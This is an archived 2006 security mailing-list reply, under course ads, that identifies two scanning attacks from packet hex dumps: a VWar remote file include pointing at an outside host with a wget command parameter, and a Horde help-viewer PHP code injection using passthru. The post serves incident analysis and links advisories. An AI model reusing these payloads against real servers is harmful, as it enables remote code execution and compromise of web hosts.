Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Incidents
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

Re: Someone scanning for new PHP issues?

from [Bojan Zdrnja] Network Security [Permanent Link]
Subject: Re: Someone scanning for new PHP issues?
Date: Sun, 16 Apr 2006 21:53:17 +1200 
On 4/16/06, Jamie Riden <jamesr@europe.com> wrote:

One of these might be the Horde exploit-
http://isc.sans.org/diary.php?storyid=1262 - any ideas on the other?

cheers,
 Jamie

02:38:43.817967 IP compromised.com.1044 > www.example.com.www: P
0:412(412) ack 1 win 65535
       0x0000:  4500 01c4 a2ac 4000 7106 5012 0ca2 a1a1  E.....@.q.P.....
       0x0010:  48e8 1e4a 0414 0050 ec05 5522 9e0c 2a9d  H..J...P..U"..*.
       0x0020:  5018 ffff 3431 0000 4745 5420 6874 7470  P...41..GET.http
       0x0030:  3a2f 2fxx xx2e yyyy yy2e 3330 2e37 342f  ://xx.yyy.30.74/
       0x0040:  7677 6172 2f69 6e63 6c75 6465 732f 6765  vwar/includes/ge
       0x0050:  745f 6865 6164 6572 2e70 6870 3f76 7761  t_header.php?vwa
       0x0060:  725f 726f 6f74 3d68 7474 703a 2f2f 7870  r_root=http://xp
       0x0070:  6c2e 6e65 746d 6973 7068 6572 6532 2e63  l.netmisphere2.c
       0x0080:  6f6d 2f43 4d44 2e67 6966 3f26 636d 643d  om/CMD.gif?&cmd=
       0x0090:  7767 6574 2048 5454 502f 312e 300d 0a48  wget.HTTP/1.0.


This is a VWar vulnerability in the get_header.php file (remote file
include vulnerability). More info at
http://www.securityfocus.com/bid/17358/info.


02:38:43.841958 IP compromised.com.1047 > www.example.com.www: P
1205950111:1205950537(426) ack 2648749032 win 65535
       0x0000:  4500 01d2 a2b9 4000 7206 4ef7 0ca2 a1a1  E.....@.r.N.....
       0x0010:  48e8 1e4a 0417 0050 47e1 569f 9de0 b3e8  H..J...PG.V.....
       0x0020:  5018 ffff 1fd8 0000 4745 5420 6874 7470  P.......GET.http
       0x0030:  3a2f 2fxx xx2e yyyy yy2e 3330 2e37 342f  ://xx.yyy.30.74/
       0x0040:  7765 626d 6169 6c2f 686f 7264 652f 7365  webmail/horde/se
       0x0050:  7276 6963 6573 2f68 656c 702f 3f73 686f  rvices/help/?sho
       0x0060:  773d 6162 6f75 7426 6d6f 6475 6c65 3d3b  w=about&module=;
       0x0070:  2532 322e 7061 7373 7468 7275 2825 3232  %22.passthru(%22
       0x0080:  6563 686f 2532 3049 524f 434b 5448 4557  echo%20IROCKTHEW
       0x0090:  4f52 4c44 2532 3229 3b27 2e20 4854 5450  ORLD%22);'..HTTP
       0x00a0:  2f31 2e30 0d0a 486f 7374 3a20 3732 2e32  /1.0..Host:.72.2
       0x00b0:  3332 2e33 302e 3734 0d0a 5265 6665 7265  32.30.74..


This is, as you wrote above, the Horde Help Viewer remote php code
execution vulnerability. More info at
http://www.securityfocus.com/bid/17292.

Unfortunately exploits are in the wild, and the Horde one is
especially bad (knowing that Horde is used a lot).

Cheers,

Bojan
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
Previous by Date:  Re: How to determine which PHP-script allows spamming?, Ademar Gonzalez
Next by Date:  Re: Someone scanning for new PHP issues?, Sûnnet Beskerming
Previous by Thread:  Someone scanning for new PHP issues?, Jamie Riden
Next by Thread:  Re: Someone scanning for new PHP issues?, Sûnnet Beskerming
Indexes:  [Date] [Thread] [Top] [All Lists]